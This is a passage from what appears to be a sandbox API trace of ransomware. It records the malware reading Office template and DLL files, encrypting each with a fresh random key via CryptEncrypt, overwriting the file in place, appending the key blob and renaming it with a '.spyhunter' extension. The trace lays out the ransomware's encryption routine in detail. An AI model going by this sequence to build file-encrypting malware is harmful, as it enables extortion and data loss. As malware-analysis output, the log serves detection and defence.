Files\\Microsoft Office\\Stationery\\1033\\JUNGLE.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\jungle.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUNGLE.HTM.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\jungle.htm.spyhunter")) returned 1 [0112.404] GetProcessHeap () returned 0x2c0000 [0112.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0112.404] GetProcessHeap () returned 0x2c0000 [0112.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0112.404] GetProcessHeap () returned 0x2c0000 [0112.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d01ab0 | out: hHeap=0x2c0000) returned 1 [0112.404] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7a0 | out: pbBuffer=0x270f7a0) returned 1 [0112.404] GetProcessHeap () returned 0x2c0000 [0112.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0112.404] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f798*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f798*=0x30) returned 1 [0112.404] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUNGLE.GIF" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\jungle.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0112.405] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUNGLE.GIF") returned 64 [0112.405] StrStrW (lpFirst="JUNGLE.GIF", lpSrch=".txt") returned 0x0 [0112.405] GetProcessHeap () returned 0x2c0000 [0112.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0112.405] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f75c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f75c*=0xfc7, lpOverlapped=0x0) returned 1 [0112.489] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff039, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.489] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xfc7, lpNumberOfBytesWritten=0x270f75c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f75c*=0xfc7, lpOverlapped=0x0) returned 1 [0112.490] GetProcessHeap () returned 0x2c0000 [0112.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0112.490] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.490] WriteFile (in: hFile=0x16c, lpBuffer=0x270f79c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f75c, lpOverlapped=0x0 | out: lpBuffer=0x270f79c*, lpNumberOfBytesWritten=0x270f75c*=0x4, lpOverlapped=0x0) returned 1 [0112.490] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f75c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f75c*=0x30, lpOverlapped=0x0) returned 1 [0112.490] CloseHandle (hObject=0x16c) returned 1 [0112.491] GetProcessHeap () returned 0x2c0000 [0112.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0112.491] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUNGLE.GIF.spyhunter") returned 74 [0112.491] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUNGLE.GIF" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\jungle.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUNGLE.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\jungle.gif.spyhunter")) returned 1 [0112.492] GetProcessHeap () returned 0x2c0000 [0112.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0112.492] GetProcessHeap () returned 0x2c0000 [0112.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0112.493] GetProcessHeap () returned 0x2c0000 [0112.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d019e0 | out: hHeap=0x2c0000) returned 1 [0112.493] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f798 | out: pbBuffer=0x270f798) returned 1 [0112.493] GetProcessHeap () returned 0x2c0000 [0112.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0112.493] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f790*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f790*=0x30) returned 1 [0112.493] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\DADSHIRT.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\dadshirt.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0112.494] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\DADSHIRT.HTM") returned 66 [0112.494] StrStrW (lpFirst="DADSHIRT.HTM", lpSrch=".txt") returned 0x0 [0112.494] GetProcessHeap () returned 0x2c0000 [0112.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0112.494] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f754, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f754*=0x1e3, lpOverlapped=0x0) returned 1 [0112.495] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffe1d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.495] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1e3, lpNumberOfBytesWritten=0x270f754, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f754*=0x1e3, lpOverlapped=0x0) returned 1 [0112.495] GetProcessHeap () returned 0x2c0000 [0112.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0112.496] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.496] WriteFile (in: hFile=0x16c, lpBuffer=0x270f794*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f754, lpOverlapped=0x0 | out: lpBuffer=0x270f794*, lpNumberOfBytesWritten=0x270f754*=0x4, lpOverlapped=0x0) returned 1 [0112.496] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f754, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f754*=0x30, lpOverlapped=0x0) returned 1 [0112.496] CloseHandle (hObject=0x16c) returned 1 [0112.496] GetProcessHeap () returned 0x2c0000 [0112.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0112.496] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\DADSHIRT.HTM.spyhunter") returned 76 [0112.496] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\DADSHIRT.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\dadshirt.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\DADSHIRT.HTM.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\dadshirt.htm.spyhunter")) returned 1 [0112.497] GetProcessHeap () returned 0x2c0000 [0112.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0112.497] GetProcessHeap () returned 0x2c0000 [0112.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0112.497] GetProcessHeap () returned 0x2c0000 [0112.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d01770 | out: hHeap=0x2c0000) returned 1 [0112.497] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f798 | out: pbBuffer=0x270f798) returned 1 [0112.497] GetProcessHeap () returned 0x2c0000 [0112.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0112.497] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f790*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f790*=0x30) returned 1 [0112.497] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\DADSHIRT.GIF" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\dadshirt.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0112.498] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\DADSHIRT.GIF") returned 66 [0112.498] StrStrW (lpFirst="DADSHIRT.GIF", lpSrch=".txt") returned 0x0 [0112.498] GetProcessHeap () returned 0x2c0000 [0112.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0112.499] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f754, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f754*=0x2e, lpOverlapped=0x0) returned 1 [0112.500] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffffd2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.500] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x270f754, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f754*=0x2e, lpOverlapped=0x0) returned 1 [0112.500] GetProcessHeap () returned 0x2c0000 [0112.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0112.501] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.501] WriteFile (in: hFile=0x16c, lpBuffer=0x270f794*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f754, lpOverlapped=0x0 | out: lpBuffer=0x270f794*, lpNumberOfBytesWritten=0x270f754*=0x4, lpOverlapped=0x0) returned 1 [0112.501] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f754, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f754*=0x30, lpOverlapped=0x0) returned 1 [0112.501] CloseHandle (hObject=0x16c) returned 1 [0112.501] GetProcessHeap () returned 0x2c0000 [0112.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0112.501] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\DADSHIRT.GIF.spyhunter") returned 76 [0112.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\DADSHIRT.GIF" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\dadshirt.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\DADSHIRT.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\dadshirt.gif.spyhunter")) returned 1 [0112.502] GetProcessHeap () returned 0x2c0000 [0112.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0112.502] GetProcessHeap () returned 0x2c0000 [0112.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0112.502] GetProcessHeap () returned 0x2c0000 [0112.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d016a0 | out: hHeap=0x2c0000) returned 1 [0112.502] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f790 | out: pbBuffer=0x270f790) returned 1 [0112.502] GetProcessHeap () returned 0x2c0000 [0112.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0112.502] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f788*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f788*=0x30) returned 1 [0112.502] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\currency.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0112.503] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.HTM") returned 66 [0112.503] StrStrW (lpFirst="CURRENCY.HTM", lpSrch=".txt") returned 0x0 [0112.503] GetProcessHeap () returned 0x2c0000 [0112.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0112.503] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f74c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f74c*=0x224, lpOverlapped=0x0) returned 1 [0112.504] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffddc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.504] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x224, lpNumberOfBytesWritten=0x270f74c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f74c*=0x224, lpOverlapped=0x0) returned 1 [0112.504] GetProcessHeap () returned 0x2c0000 [0112.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0112.504] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.504] WriteFile (in: hFile=0x16c, lpBuffer=0x270f78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f74c, lpOverlapped=0x0 | out: lpBuffer=0x270f78c*, lpNumberOfBytesWritten=0x270f74c*=0x4, lpOverlapped=0x0) returned 1 [0112.505] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f74c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f74c*=0x30, lpOverlapped=0x0) returned 1 [0112.505] CloseHandle (hObject=0x16c) returned 1 [0112.505] GetProcessHeap () returned 0x2c0000 [0112.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0112.505] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.HTM.spyhunter") returned 76 [0112.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\currency.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.HTM.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\currency.htm.spyhunter")) returned 1 [0112.593] GetProcessHeap () returned 0x2c0000 [0112.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0112.594] GetProcessHeap () returned 0x2c0000 [0112.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0112.594] GetProcessHeap () returned 0x2c0000 [0112.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d015d0 | out: hHeap=0x2c0000) returned 1 [0112.595] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f788 | out: pbBuffer=0x270f788) returned 1 [0112.595] GetProcessHeap () returned 0x2c0000 [0112.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0112.595] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f780*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f780*=0x30) returned 1 [0112.595] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\XPAGE3C.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\xpage3c.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0112.596] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\XPAGE3C.DLL") returned 58 [0112.596] StrStrW (lpFirst="XPAGE3C.DLL", lpSrch=".txt") returned 0x0 [0112.596] GetProcessHeap () returned 0x2c0000 [0112.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0112.596] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f744, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f744*=0x2800, lpOverlapped=0x0) returned 1 [0112.647] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.647] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f744, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f744*=0x2800, lpOverlapped=0x0) returned 1 [0112.647] GetProcessHeap () returned 0x2c0000 [0112.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0112.648] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.648] WriteFile (in: hFile=0x16c, lpBuffer=0x270f784*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f744, lpOverlapped=0x0 | out: lpBuffer=0x270f784*, lpNumberOfBytesWritten=0x270f744*=0x4, lpOverlapped=0x0) returned 1 [0112.664] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f744, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f744*=0x30, lpOverlapped=0x0) returned 1 [0112.664] CloseHandle (hObject=0x16c) returned 1 [0112.668] GetProcessHeap () returned 0x2c0000 [0112.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0112.668] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\XPAGE3C.DLL.spyhunter") returned 68 [0112.668] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\XPAGE3C.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\xpage3c.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\XPAGE3C.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\xpage3c.dll.spyhunter")) returned 1 [0112.669] GetProcessHeap () returned 0x2c0000 [0112.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0112.669] GetProcessHeap () returned 0x2c0000 [0112.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0112.669] GetProcessHeap () returned 0x2c0000 [0112.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de21e8 | out: hHeap=0x2c0000) returned 1 [0112.669] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f788 | out: pbBuffer=0x270f788) returned 1 [0112.669] GetProcessHeap () returned 0x2c0000 [0112.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0112.669] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f780*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f780*=0x30) returned 1 [0112.669] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Northwind.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\northwind.accdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0112.670] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Northwind.accdt") returned 75 [0112.670] StrStrW (lpFirst="Northwind.accdt", lpSrch=".txt") returned 0x0 [0112.670] GetProcessHeap () returned 0x2c0000 [0112.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0112.670] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f744, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f744*=0x2800, lpOverlapped=0x0) returned 1 [0112.800] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.800] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f744, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f744*=0x2800, lpOverlapped=0x0) returned 1 [0112.800] GetProcessHeap () returned 0x2c0000 [0112.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0112.800] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.800] WriteFile (in: hFile=0x158, lpBuffer=0x270f784*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f744, lpOverlapped=0x0 | out: lpBuffer=0x270f784*, lpNumberOfBytesWritten=0x270f744*=0x4, lpOverlapped=0x0) returned 1 [0112.805] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f744, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f744*=0x30, lpOverlapped=0x0) returned 1 [0112.805] CloseHandle (hObject=0x158) returned 1 [0112.806] GetProcessHeap () returned 0x2c0000 [0112.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e0c840 [0112.806] wnsprintfW (in: pszDest=0x2e0c840, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Northwind.accdt.spyhunter") returned 85 [0112.806] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Northwind.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\northwind.accdt"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Northwind.accdt.spyhunter" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\northwind.accdt.spyhunter")) returned 1 [0112.808] GetProcessHeap () returned 0x2c0000 [0112.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0c840 | out: hHeap=0x2c0000) returned 1 [0112.808] GetProcessHeap () returned 0x2c0000 [0112.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0112.808] GetProcessHeap () returned 0x2c0000 [0112.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de08e8 | out: hHeap=0x2c0000) returned 1 [0112.808] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f780 | out: pbBuffer=0x270f780) returned 1 [0112.808] GetProcessHeap () returned 0x2c0000 [0112.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0112.808] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f778*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f778*=0x30) returned 1 [0112.808] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\Microsoft.Synchronization.dll" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\microsoft.synchronization.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0112.823] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\Microsoft.Synchronization.dll") returned 92 [0112.823] StrStrW (lpFirst="Microsoft.Synchronization.dll", lpSrch=".txt") returned 0x0 [0112.824] GetProcessHeap () returned 0x2c0000 [0112.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0112.824] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f73c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f73c*=0x2800, 